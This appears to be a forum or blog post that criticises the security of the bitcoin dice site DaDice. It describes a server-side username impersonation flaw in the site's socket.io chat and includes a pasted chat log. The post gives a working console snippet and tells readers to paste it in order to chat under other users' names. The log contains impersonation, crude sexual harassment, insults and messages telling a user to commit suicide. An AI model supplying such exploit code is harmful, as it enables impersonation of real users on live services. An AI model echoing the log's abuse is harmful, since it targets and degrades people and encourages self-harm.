So DaDice was hacked yesterday. Albeit only a chat hack, but it turns out (according to what the dev said in chat) the hack was not just a unicode trick or similar: it was a direct change to the server-side variables that store usernames. This makes it unlike any other chat hack on other dice sites. On other sites it is basically a client-side rendering issue, and the server was not infiltrated. On DaDice the username was actually changed on the server via a very simple websocket parameter change.
Why is this significant? The moderators will tell you it was just a hack to the chat system and was in no way an issue for the security of the site. To me it is more than that. It is the site's controls over web sessions that are now in question. Why is it possible to change any details of a web session on the server? The server, and only the server, should be tracking this and ensuring that the username used to log in and the session cannot be changed. In this case, it demonstrates that this site could have more serious vulnerabilities.
The statement "it's just a simple chat hack" no longer makes any difference. They have yet to fix it! If it was so simple, why has it taken so long?
DenseCrab also complained that he lost access to his account and logged in as CenseDrab due to this access issue. He was also the first to be targeted in chat.
How was it done? After inspecting the code, one thing is very obvious.
The site made it easy: the client tells the server who it is, and the server does no checks of who it actually is.
A variable object that defined the user looked like this:
socket_handshake_gameplay_token = {
    "token": "1111|1984798bc3ed82374f|11.11.11.11",
    "user": {
        "id": "1111",
        "username": "username",
        "cm": "false"
    }
}
Change the username in the variable above and then log back in:
socket.emit("online", socket_handshake_gameplay_token)
You now have someone else's username. No server-side checks or anything!
Because this actually changed server-side variables, it is considered a serious issue. I have read through more of the code and found a few more instances of poor coding like this.
As for the lag on the site: it has so many DOM updates it is ridiculous. What this means is that the browser is constantly updating elements on the page, even some that do not need to be updated. This in turn causes your browser to use a lot of CPU and memory, because it is quite slow at updating the DOM. The other issue is that socket.io is preferring to use AJAX over websockets. AJAX long polling causes the browser to do a lot of work and is not really the way forward for something like a gambling site. DaDice should force websocket and only websocket. If you have a 2-year-old browser then stiff, upgrade or don't use the site.
My recommendation is to steer clear of this one. It is clearly coded by opportunists and not bitcoin/web coder types. It is therefore probably suffering from many security risks.
If you do continue, it should be a good ride as hackers eventually work out a method to steal coins. Or maybe they already are and the owners are unaware... how many times have we seen this happen to new, unsuspecting victims? Stick with the trusted and tested sites that have lasted over 2 years. You have lower risk at these sites.
If you want to try it: after loading the website, press F12. In the console, paste the code below and press enter. You will get an input box in the top menu, and you can change your name to any other user's and chat using their name.
$('.header-inner').append('
');
var changeName = function(){
    if ($('#newName').val()){
        socket_handshake_gameplay_token.user.username=$('#newName').val();
        socket.emit("online", socket_handshake_gameplay_token);
    }
}
I took a snapshot of the entire chat from when it started, as it is quite amusing, but it is hard to follow as the attacker uses everyone's name.
DenseCrab:
i saw azreal without mod before it
Psychedelic:
told you what to do to solve this
DenseCrab:
a few minutes ago
Psychedelic:
first enable 2fa and then change your pass
DenseCrab:
ok, but i have to stroke my dick first
TIP:
DreamStage sent a tip of 0.00050000 BTC to DDBank
DenseCrab:
after licking a 10inch cock I always have to stroke mine.
Psychedellic:
Me too
Psychedelic:
fake Dense do us a favor and go fuck yourself.
Psychedelic:
lol
Psychedelic:
so someone found a way to change the chat name..
Psychedelic:
Dense you were not hacked..
Staff dadice_dev:
nobody is hacked. this is a small trick
Psychedellic:
you hear me.. go fuck yourself!
Psychedelic:
Psychedellic with 2 ll not me
Psychedellic:
What's the trick?
Psychedelic:
changing your name obviously in chat
Psychedellic:
is your code shit?
Psychedelic:
not mine
saurav:
or he used dense.crab at the username
dadice_dev:
it's crap code all right!
saurav:
something like that gmail trick
saurav:
what's happening here man
DenseCrab:
no.. it's all about butt magic
Psychedelic:
lol..
Psychedelic:
it's simple..
Psychedelic:
someone found a way to change his name in the chat
saurav:
Well we gathered that. but IT guy doesn't know how or he would have stopped it by now..
Staff dadice_dev:
No he has basically connected to sockets directly and emitting simple "chat" status, thinking he is very big smart ass
Laimu:
Hello
Laimu:
i read about the hacks
Staff dadice_dev:
nothing has been hacked so nothing to worry about regarding this clown
Staff dadice_dev:
It will be taken care of shortly
Laimu:
how much coin they take
dadice_dev:
It's a bit too easy
Psychedelic:
it's easy to stop..
dadice_dev:
can we do other things over this socket?
Staff dadice_dev:
oh boy he wishes
Mod Azrael:
Thank you Sid.
Staff dadice_dev:
yes... it will be stopped soon
dadice_dev:
oh look........ bitcoin!!!
Staff dadice_dev:
let me have my coffee first
Laimu:
ok better put out a statement on reddit and/or forum
Laimu:
get this situation contained nicely
Staff dadice_dev:
I am not really that worried about this troll / clown
Psychedelic:
haha enjoy dev
Laimu:
coo.. I hope you get your coin back
Laimu:
good idea
Laimu:
I hate it when people steal my coin.
Laimu:
is there a safe place to dice these days?
Mod Azrael:
No coin has been taken Laimu.
Laimu:
pocketrocketscas is proven
Laimu:
Not yet.. but this site is pretty poorly coded.
Mod cavetroll:
Laimu what are you on about?
Laimu:
Hurry up and fix it!!!
Staff dadice_dev:
There is nothing to hurry up about
Staff dadice_dev:
there is just a troll in chat.
Stichedupsmile:
Must be a pretty good poorly coded site if so many people go on it.
Stichedupsmile:
Logic is 10/10
Staff dadice_dev:
your accounts are all secure
Stichedupsmile:
Ahh ok
dadice_dev:
don't panic it's all under control
dadice_dev:
We can't stop server side actions from happening and don't look at session controls.. but don't panic.
Stichedupsmile:
This kid's obviously got nothing better to do ^
CenseDrab:
i got hacked
CenseDrab:
dev
CenseDrab:
im the real densecrab btw
dadice_dev:
Bored shitless
CenseDrab:
i can't log in on it anymore
Psychedelic:
lol no you are not
DenseCrab:
Sorry DenseCrab.. try again
CenseDrab:
ah dev also hacked
DenseCrab:
Entire site hacked!
DenseCrab:
Run for the hills
Mod cavetroll:
Shut up you little pissant
CenseDrab:
child
Mod cavetroll:
Site has not been hacked this is just a pissy little child at work
DenseCrab:
indeed
Bazza:
I'm more of a bored executive.
Mod cavetroll:
Oh so you're confessing?
Bazza:
Someone has to steal all the bitcoin left in the open.. right?
Mod cavetroll:
If that's how you sort your boredom how sad is your life?
Bazza:
yeah
Bazza:
pretty sad... but funny how poorly coded this is
Mod cavetroll:
yeah what
CenseDrab:
Maybe you should just suicide sir "DenseCrab"
Zemzz:
Hello guys
cavetroll:
Yeah DenseCrab.. suicide
Zemzz:
Hi
Mod cavetroll:
Bazza that says far more about you than even you realise. pathetic, sad and pointless
Zemzz:
I want to play with cavetroll's balls
Mod cavetroll:
Hey Zemzz
Lewie:
Don't we all
Zemzz:
lol
Zemzz:
lighten up fellas
Zemzz:
I'm sure we have a laugh
Mod cavetroll:
surprises me that people with this mentality still exist
Psychedelic:
welcome to the internet
Psychedelic:
you have seen nothing
Zemzz:
Why, you need people to keep you honest